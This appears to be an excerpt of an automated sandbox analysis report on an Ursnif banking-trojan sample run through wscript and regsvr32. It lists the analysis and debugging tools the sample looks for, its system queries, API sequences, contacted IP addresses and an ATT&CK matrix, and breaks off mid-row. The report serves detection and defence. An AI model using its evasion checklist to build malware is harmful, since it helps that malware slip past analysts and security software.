            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE@:V
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE@
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000000.00000003.427368089.000001E407D07000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXE@K
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: SYSER.EXE@=
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE@
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation
            Source: C:\Windows\System32\wscript.exe TID: 876 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1464 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D09673 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
            Source: wscript.exe, 00000000.00000002.486903995.000001E40BBD0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: regsvr32.exe, 00000005.00000003.1982782088.000000000347C000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWen-USn$
            Source: wscript.exe, 00000000.00000002.485399983.000001E408C31000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000003.1573770663.000000000349A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.486903995.000001E40BBD0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.486903995.000001E40BBD0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: regsvr32.exe, 00000005.00000003.1235956194.000000000347E000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWen-USn-
            Source: regsvr32.exe, 00000005.00000003.1471328398.0000000003483000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWen-USn*
            Source: wscript.exe, 00000000.00000002.486903995.000001E40BBD0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E162123 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E19C49B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E19BF3D push dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E19C333 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E161EE4 InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: swatch.c.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 8.209.73.71 80Jump to behavior
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 88.99.66.31 187Jump to behavior
            Source: regsvr32.exe, 00000004.00000002.2139662902.00000000018A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2140997723.00000000038A0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: regsvr32.exe, 00000004.00000002.2139662902.00000000018A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2140997723.00000000038A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: regsvr32.exe, 00000004.00000002.2139662902.00000000018A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2140997723.00000000038A0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: regsvr32.exe, 00000004.00000002.2139662902.00000000018A0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2140997723.00000000038A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,5_2_6E1621F5
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D01ACF cpuid 5_2_04D01ACF
            Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Ammerman.zip VolumeInformation (9 identical events)
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E162123 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError,5_2_6E162123
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_04D01ACF wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,5_2_04D01ACF
            Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 5_2_6E1610C4 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,5_2_6E1610C4
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.427383578.000001E407CFF000.00000004.00000001.sdmp | Binary or memory string: autoruns.exe
            Source: wscript.exe, 00000000.00000003.465392585.000001E407D04000.00000004.00000001.sdmp | Binary or memory string: ollydbg.exe
            Source: wscript.exe, 00000000.00000003.464935937.000001E407D0D000.00000004.00000001.sdmp | Binary or memory string: regshot.exe

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match | File source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match | File source: 00000005.00000003.713720009.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.2142802778.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713644364.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713379990.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713505231.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713857412.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713826669.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713290749.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000003.713781031.0000000005D68000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 4920, type: MEMORY

            Mitre Att&ck Matrix

            Columns are ATT&CK tactics; each row is one line of the report's matrix. Digits following a technique name are the report's signature-hit badges, reproduced as extracted.

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 321 | Winlogon Helper DLL | Process Injection 12 | Software Packing 1 | Credential Dumping | System Time Discovery 1 | Remote File Copy 3 | Data from Local System | Data Encrypted 1 | Remote File Copy 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Replication Through Removable Media | Scripting 121 | Port Monitors | Accessibility Features | Scripting 121 | Network Sniffing | Account Discovery 1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            External Remote Services | Execution through API 1 | Accessibility Features | Path Interception | File Deletion 1 | Input Capture | Security Software Discovery 231 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Drive-by Compromise | Exploitation for Client Execution 1 | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information 3 | Credentials in Files | File and Directory Discovery 3 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol 4 | SIM Card Swap | Premium SMS Toll Fraud |
            Exploit Public-Facing Application | Graphical User Interface 1 | Shortcut Modification | File System Permissions Weakness | Masquerading 11 | Account Manipulation | System Information Discovery 56 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
            Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Virtualization/Sandbox Evasion 3 | Brute Force | Virtualization/Sandbox Evasion 3 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | Abuse Accessibility Features |
            Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Process Inject (row truncated in extraction)